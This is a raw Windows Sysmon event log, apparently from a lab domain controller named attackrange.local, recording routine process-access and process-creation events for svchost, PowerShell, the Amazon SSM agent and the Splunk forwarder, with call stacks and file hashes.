13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.456{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.454{59A5CD1D-8E5B-6005-5500-00000000A301}37483696C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.455{59A5CD1D-8E5D-6005-6800-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.908{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.710{59A5CD1D-8E5E-6005-6E00-00000000A301}3976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.704{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.704{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.622{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_nm4iatmj.hja.ps12021-01-18 13:34:22.622 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.610{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.582{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5E-6005-6D00-00000000A301}3548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.581{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 